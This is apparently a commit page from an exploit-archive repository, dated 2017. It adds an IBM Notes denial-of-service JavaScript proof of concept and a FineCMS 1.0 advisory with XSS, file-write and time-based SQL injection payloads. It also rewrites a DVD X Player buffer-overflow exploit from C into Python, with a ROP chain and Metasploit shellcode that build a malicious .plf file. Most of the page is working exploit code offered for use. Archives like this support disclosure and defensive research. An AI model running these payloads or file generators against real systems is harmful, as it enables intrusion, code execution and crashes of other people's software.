DB: 2017-09-04
2 new exploits IBM Notes 8.5.x/9.0.x - Denial of Service FineCMS 1.0 - Multiple Vulnerabilities
This commit is contained in:
parent
a160bc0c68
commit
572d7c5002
4 changed files with 197 additions and 73 deletions
|
@ -5665,6 +5665,7 @@ id,file,description,date,author,platform,type,port
|
|||
42546,platforms/linux/dos/42546.txt,"libgig 4.0.0 (LinuxSampler) - Multiple Vulnerabilities",2017-08-23,qflb.wu,linux,dos,0
|
||||
42518,platforms/hardware/dos/42518.txt,"NoviFlow NoviWare < NW400.2.6 - Multiple Vulnerabilities",2017-08-18,"François Goichon",hardware,dos,0
|
||||
42600,platforms/linux/dos/42600.txt,"OpenJPEG - 'mqc.c' Heap-Based Buffer Overflow",2017-09-01,"Ke Liu",linux,dos,0
|
||||
42602,platforms/multiple/dos/42602.html,"IBM Notes 8.5.x/9.0.x - Denial of Service",2017-09-02,"Dhiraj Mishra",multiple,dos,0
|
||||
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
||||
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
||||
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
|
||||
|
@ -38384,3 +38385,4 @@ id,file,description,date,author,platform,type,port
|
|||
42596,platforms/php/webapps/42596.txt,"Joomla! Component Huge-IT Video Gallery 1.0.9 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0
|
||||
42597,platforms/php/webapps/42597.txt,"Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.6 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0
|
||||
42598,platforms/php/webapps/42598.txt,"Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.7 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0
|
||||
42603,platforms/php/webapps/42603.txt,"FineCMS 1.0 - Multiple Vulnerabilities",2017-08-29,sohaip-hackerDZ,php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
32
platforms/multiple/dos/42602.html
Executable file
32
platforms/multiple/dos/42602.html
Executable file
|
@ -0,0 +1,32 @@
|
|||
# Exploit Title: IBM Notes is affected by a denial of service vulnerability
|
||||
# Date: 31 August 2017
|
||||
# Software Link: https://www-01.ibm.com/support/docview.wss?uid=swg24037141
|
||||
# Exploit Author: Dhiraj Mishra
|
||||
# Contact: http://twitter.com/mishradhiraj_
|
||||
# Website: http://datarift.blogspot.in/
|
||||
# CVE: CVE-2017-1129
|
||||
# Category: IBM Notes (Console Application)
|
||||
|
||||
|
||||
1. Description
|
||||
|
||||
IBM Notes is vulnerable to a denial of service involving persuading a user to click on a malicious link, which would ultimately cause the client to have to be restarted.
|
||||
|
||||
2. Proof of concept
|
||||
|
||||
<html><head><title></title>
|
||||
<script type="text/javascript">
|
||||
while (true) try {
|
||||
var object = { };
|
||||
function g(f0) {
|
||||
var f0 = (object instanceof encodeURI)('foo');
|
||||
}
|
||||
g(75);
|
||||
} catch (g) { }
|
||||
</script>
|
||||
</head></html>
|
||||
|
||||
|
||||
3. IBM Security Bulletin
|
||||
|
||||
www-01.ibm.com/support/docview.wss?uid=swg21999385
|
114
platforms/php/webapps/42603.txt
Executable file
114
platforms/php/webapps/42603.txt
Executable file
|
@ -0,0 +1,114 @@
|
|||
# # # # #
|
||||
# Exploit Title: FineCMS 1.0 Multiple Vulnerabilities
|
||||
# Dork: N/A
|
||||
# Date: 29.08.2017
|
||||
# Vendor Homepage : http://mvc.net.pl/
|
||||
# Software Link: https://github.com/andrzuk/FineCMS
|
||||
# Version: 1.0
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: N/A
|
||||
# # # # #
|
||||
# Exploit Author: sohaip-hackerDZ
|
||||
# Author Web: http://www.hacker-ar.com
|
||||
# Author Social: @sohaip_hackerDZ
|
||||
# # # # #
|
||||
|
||||
Reflected XSS in get_image.php
|
||||
Technical Description:
|
||||
file /application/lib/ajax/get_image.php the $_POST['id'] and $_POST['name'] and $_GET['folder'] without any validated, sanitised or output encoded.
|
||||
|
||||
Proof of Concept(PoC)
|
||||
http://your_finecms/application/lib/ajax/get_image.php?folder=1
|
||||
|
||||
POST:
|
||||
|
||||
id=1"><script>alert(1)</script>&name=1
|
||||
|
||||
Arbitrary File Modify
|
||||
Technical Description:
|
||||
The base function for modify the template can modify the filename,this leads to the Arbitrary File Modify, who could allow attacker getshell.
|
||||
|
||||
file /appalication/core/controller/template.php line50-line53
|
||||
|
||||
follow function save() file /appalication/core/model/template.php line26-line48
|
||||
|
||||
if file exists, we can modify it whihout any limit.
|
||||
|
||||
insterestingly, there are two more Vulnerability for same function in different files.
|
||||
|
||||
file /appalication/core/model/style.php line26-line48
|
||||
|
||||
file /appalication/core/model/script.php line26-line48
|
||||
|
||||
Proof of Concept(PoC)
|
||||
http://your_finecms/index.php?route=template
|
||||
http://your_finecms/index.php?route=style
|
||||
http://your_finecms/index.php?route=script
|
||||
|
||||
POST:
|
||||
contents=<?php phpinfo();?>&filename={any exist filename}&savabutton=Zapisz
|
||||
|
||||
Authenticated SQL injection
|
||||
all FineCMS use PDO to connect the mysql server, so all the data without any validated, sanitised or output encoded injection database.but in application/core/controller/excludes.php, the website author use mysqli to connect mysql server.the lead SQL injection, who could allow attacker use some payload to get data in database.
|
||||
|
||||
Technical Description:
|
||||
file application/core/controller/excludes.php line75, the visitor_ip insert into database without any validated, sanitised or output encoded.
|
||||
|
||||
|
||||
file /stat/get_stat_data.php line30
|
||||
|
||||
|
||||
the sql inject into sql_query and execute.
|
||||
|
||||
Proof of Concept(PoC)
|
||||
http://your_finecms/index.php?route=excludes&action=add
|
||||
|
||||
POST:
|
||||
visitor_ip=1%27%2Csleep%281%29%2C%271&save_button=Zapisz
|
||||
and view http://your_finecms/stat/get_stat_data.php,we can feel website loading sleep.
|
||||
|
||||
|
||||
Stored XSS in images.php
|
||||
FineCMS allow admin to upload image into gallery, and it will show image data into pages, but some data will output into pages without any validated, sanitised or output encoded. they allow attacker Cross Site Scripting.
|
||||
|
||||
Technical Description:
|
||||
when we upload the file
|
||||
|
||||
file application/core/controller/images.php line87
|
||||
|
||||
|
||||
and follow the function add() file application/core/model/images.php line78
|
||||
|
||||
|
||||
if filetype startwith "image",the filetype will insert into database
|
||||
|
||||
when we view the detail of the images file application/lib/generators/view.php line106, somethings will output into pages.
|
||||
|
||||
|
||||
Proof of Concept(PoC)
|
||||
view the http://your_finecms/index.php?route=images&action=add and upload picture
|
||||
|
||||
modify the picture's filetype
|
||||
|
||||
view the detail of picture
|
||||
|
||||
|
||||
|
||||
Because of the vulnerability also in edit detail page. so you also can use edit to insert Script code in pages.
|
||||
|
||||
http://your_finecms/index.php?route=images&action=edit&id=15
|
||||
|
||||
view the detail of picture
|
||||
|
||||
|
||||
Stored XSS in visitors.php
|
||||
FineCMS stores all the visitors the visit url, but in detail of log they output into pages without any validated, sanitised or output encoded. they allow attacker Cross Site Scripting.
|
||||
|
||||
Technical Description:
|
||||
just like last vulnerability.
|
||||
|
||||
Proof of Concept(PoC)
|
||||
visit any page with js script code. such as
|
||||
|
||||
index.php?route=images&action=view&id=14'"><script>alert(1)</script>
|
|
@ -8,80 +8,56 @@
|
|||
// # Tested on: Windows XP SP2, Windows XP SP3, Windows 7
|
||||
// # Testers: _ming, g0tmi1k, corelanc0d3r, ryujin, sinn3r O_o.
|
||||
|
||||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
#include <stdlib.h>
|
||||
import sys,os
|
||||
|
||||
main()
|
||||
{
|
||||
rop = "\x02\x67\x62\x61" # POP EAX # RETN [EPG.dll]
|
||||
rop += "\x90\x90\x90\x90" # PADDING
|
||||
rop += "\x90\x90\x90\x90" # PADDING
|
||||
rop += "\x90\x90\x90\x90" # PADDING
|
||||
rop += "\x90\x90\x90\x90" # PADDING
|
||||
rop += "\x08\x11\x01\x10" # POINTER TO VirtualProtect() [IAT SkinScrollBar.Dll]
|
||||
rop += "\xed\x06\x63\x61" # MOV EAX,DWORD PTR DS:[EAX] # RETN [EPG.dll]
|
||||
rop += "\xd8\x85\x63\x61" # XCHG EAX,ESI # RETN 00 [EPG.dll]
|
||||
rop += "\x02\xd2\x62\x61" # POP EBP # RETN [EPG.dll]
|
||||
rop += "\xc8\xca\x60\x61" # PUSH ESP [EPG.dll]
|
||||
rop += "\x02\x67\x62\x61" # POP EAX # RETN [EPG.dll]
|
||||
rop += "\xff\xfa\xff\xff" # AFTER NEGATE --> 0x00000501
|
||||
rop += "\x9c\x7d\x62\x61" # NEG EAX # RETN [EPG.dll]
|
||||
rop += "\x24\x01\x64\x61" # XCHG EAX,EBX # RETN [EPG.dll]
|
||||
rop += "\x02\x67\x62\x61" # POP EAX # RETN [EPG.dll]
|
||||
rop += "\xc0\xff\xff\xff" # AFTER NEGATE --> 0x00000040
|
||||
rop += "\x9c\x7d\x62\x61" # NEG EAX # RETN [EPG.dll]
|
||||
rop += "\xa2\x8b\x60\x61" # XCHG EAX,EDX # RETN [EPG.dll]
|
||||
rop += "\x04\xb8\x60\x61" # POP ECX # RETN [EPG.dll]
|
||||
rop += "\x54\x10\x66\x61" # WRITABLE LOCATION [EPG.dll]
|
||||
rop += "\x87\xe5\x62\x61" # POP EDI # RETN [EPG.dll]
|
||||
rop += "\x1d\x08\x63\x61" # RETN (ROP NOP) [EPG.dll]
|
||||
rop += "\x02\x67\x62\x61" # POP EAX # RETN [EPG.dll]
|
||||
rop += "\x90\x90\x90\x90" # PADDING
|
||||
rop += "\x31\x08\x62\x61" # PUSHAD # RETN [EPG.dll]
|
||||
|
||||
char rop[] = "\x02\x67\x62\x61" // # POP EAX # RETN [EPG.dll]
|
||||
"\x90\x90\x90\x90" // # PADDING
|
||||
"\x90\x90\x90\x90" // # PADDING
|
||||
"\x90\x90\x90\x90" // # PADDING
|
||||
"\x90\x90\x90\x90" // # PADDING
|
||||
"\x08\x11\x01\x10" // # POINTER TO VirtualProtect() [IAT SkinScrollBar.Dll]
|
||||
"\xed\x06\x63\x61" // # MOV EAX,DWORD PTR DS:[EAX] # RETN [EPG.dll]
|
||||
"\xd8\x85\x63\x61" // # XCHG EAX,ESI # RETN 00 [EPG.dll]
|
||||
"\x02\xd2\x62\x61" // # POP EBP # RETN [EPG.dll]
|
||||
"\xc8\xca\x60\x61" // # PUSH ESP [EPG.dll]
|
||||
"\x02\x67\x62\x61" // # POP EAX # RETN [EPG.dll]
|
||||
"\xff\xfa\xff\xff" // # AFTER NEGATE --> 0x00000501
|
||||
"\x9c\x7d\x62\x61" // # NEG EAX # RETN [EPG.dll]
|
||||
"\x24\x01\x64\x61" // # XCHG EAX,EBX # RETN [EPG.dll]
|
||||
"\x02\x67\x62\x61" // # POP EAX # RETN [EPG.dll]
|
||||
"\xc0\xff\xff\xff" // # AFTER NEGATE --> 0x00000040
|
||||
"\x9c\x7d\x62\x61" // # NEG EAX # RETN [EPG.dll]
|
||||
"\xa2\x8b\x60\x61" // # XCHG EAX,EDX # RETN [EPG.dll]
|
||||
"\x04\xb8\x60\x61" // # POP ECX # RETN [EPG.dll]
|
||||
"\x01\xb0\x64\x61" // # WRITABLE LOCATION [EPG.dll]
|
||||
"\x87\xe5\x62\x61" // # POP EDI # RETN [EPG.dll]
|
||||
"\x1d\x08\x63\x61" // # RETN (ROP NOP) [EPG.dll]
|
||||
"\x02\x67\x62\x61" // # POP EAX # RETN [EPG.dll]
|
||||
"\x90\x90\x90\x90" // # PADDING
|
||||
"\x31\x08\x62\x61"; // # PUSHAD # RETN [EPG.dll]
|
||||
|
||||
// # msfpayload windows/exec CMD=calc.exe R | msfencode -b "\x00\x0a\x0d\x1a" -t c
|
||||
// # Around 400 bytes for shellcode :)
|
||||
char sc[] = "\xba\x7a\x70\x9a\xd3\xd9\xc0\xd9\x74\x24\xf4\x5e\x31\xc9\xb1"
|
||||
"\x33\x31\x56\x12\x83\xc6\x04\x03\x2c\x7e\x78\x26\x2c\x96\xf5"
|
||||
"\xc9\xcc\x67\x66\x43\x29\x56\xb4\x37\x3a\xcb\x08\x33\x6e\xe0"
|
||||
"\xe3\x11\x9a\x73\x81\xbd\xad\x34\x2c\x98\x80\xc5\x80\x24\x4e"
|
||||
"\x05\x82\xd8\x8c\x5a\x64\xe0\x5f\xaf\x65\x25\xbd\x40\x37\xfe"
|
||||
"\xca\xf3\xa8\x8b\x8e\xcf\xc9\x5b\x85\x70\xb2\xde\x59\x04\x08"
|
||||
"\xe0\x89\xb5\x07\xaa\x31\xbd\x40\x0b\x40\x12\x93\x77\x0b\x1f"
|
||||
"\x60\x03\x8a\xc9\xb8\xec\xbd\x35\x16\xd3\x72\xb8\x66\x13\xb4"
|
||||
"\x23\x1d\x6f\xc7\xde\x26\xb4\xba\x04\xa2\x29\x1c\xce\x14\x8a"
|
||||
"\x9d\x03\xc2\x59\x91\xe8\x80\x06\xb5\xef\x45\x3d\xc1\x64\x68"
|
||||
"\x92\x40\x3e\x4f\x36\x09\xe4\xee\x6f\xf7\x4b\x0e\x6f\x5f\x33"
|
||||
"\xaa\xfb\x4d\x20\xcc\xa1\x1b\xb7\x5c\xdc\x62\xb7\x5e\xdf\xc4"
|
||||
"\xd0\x6f\x54\x8b\xa7\x6f\xbf\xe8\x58\x3a\xe2\x58\xf1\xe3\x76"
|
||||
"\xd9\x9c\x13\xad\x1d\x99\x97\x44\xdd\x5e\x87\x2c\xd8\x1b\x0f"
|
||||
"\xdc\x90\x34\xfa\xe2\x07\x34\x2f\x81\xc6\xa6\xb3\x68\x6d\x4f"
|
||||
"\x51\x75";
|
||||
# Metasploit calc.exe shellcode -b "\x00\x0a\x0d\x1a\x20"
|
||||
buf = ""
|
||||
buf += "\xba\xad\xe1\xd9\x21\xda\xd8\xd9\x74\x24\xf4\x5e\x33"
|
||||
buf += "\xc9\xb1\x31\x83\xee\xfc\x31\x56\x0f\x03\x56\xa2\x03"
|
||||
buf += "\x2c\xdd\x54\x41\xcf\x1e\xa4\x26\x59\xfb\x95\x66\x3d"
|
||||
buf += "\x8f\x85\x56\x35\xdd\x29\x1c\x1b\xf6\xba\x50\xb4\xf9"
|
||||
buf += "\x0b\xde\xe2\x34\x8c\x73\xd6\x57\x0e\x8e\x0b\xb8\x2f"
|
||||
buf += "\x41\x5e\xb9\x68\xbc\x93\xeb\x21\xca\x06\x1c\x46\x86"
|
||||
buf += "\x9a\x97\x14\x06\x9b\x44\xec\x29\x8a\xda\x67\x70\x0c"
|
||||
buf += "\xdc\xa4\x08\x05\xc6\xa9\x35\xdf\x7d\x19\xc1\xde\x57"
|
||||
buf += "\x50\x2a\x4c\x96\x5d\xd9\x8c\xde\x59\x02\xfb\x16\x9a"
|
||||
buf += "\xbf\xfc\xec\xe1\x1b\x88\xf6\x41\xef\x2a\xd3\x70\x3c"
|
||||
buf += "\xac\x90\x7e\x89\xba\xff\x62\x0c\x6e\x74\x9e\x85\x91"
|
||||
buf += "\x5b\x17\xdd\xb5\x7f\x7c\x85\xd4\x26\xd8\x68\xe8\x39"
|
||||
buf += "\x83\xd5\x4c\x31\x29\x01\xfd\x18\x27\xd4\x73\x27\x05"
|
||||
buf += "\xd6\x8b\x28\x39\xbf\xba\xa3\xd6\xb8\x42\x66\x93\x37"
|
||||
buf += "\x09\x2b\xb5\xdf\xd4\xb9\x84\xbd\xe6\x17\xca\xbb\x64"
|
||||
buf += "\x92\xb2\x3f\x74\xd7\xb7\x04\x32\x0b\xc5\x15\xd7\x2b"
|
||||
buf += "\x7a\x15\xf2\x4f\x1d\x85\x9e\xa1\xb8\x2d\x04\xbe"
|
||||
|
||||
|
||||
char *exploit=malloc(900),*junk=malloc(260),*junk2=malloc(15),*junk3=malloc(20);
|
||||
memset(junk,0x41,260);
|
||||
memset(junk2,0x90,15);
|
||||
memset(junk3,0x90,20);
|
||||
strcpy(exploit,junk);
|
||||
strcat(exploit,rop);
|
||||
strcat(exploit,junk2);
|
||||
strcat(exploit,sc);
|
||||
strcat(exploit,junk3);
|
||||
|
||||
|
||||
printf("\nDVD X Player Professional/Standard 5.5\n");
|
||||
printf("Author: sickness\n");
|
||||
printf("Creating malicious .plf file, please wait.\n");
|
||||
usleep(50000);
|
||||
|
||||
FILE *evil;
|
||||
evil=fopen("malicious.plf","w");
|
||||
fwrite(exploit,1,900,evil);
|
||||
fclose(evil);
|
||||
printf("File created!\n\n");
|
||||
|
||||
return 0;
|
||||
}
|
||||
exploit = "\x41" * 260 + rop + "\x90" * 20 + buf + "\x90" * 50
|
||||
file = open("malicious.plf", "w")
|
||||
file.write(exploit)
|
||||
file.close()
|
Loading…
Add table
Reference in a new issue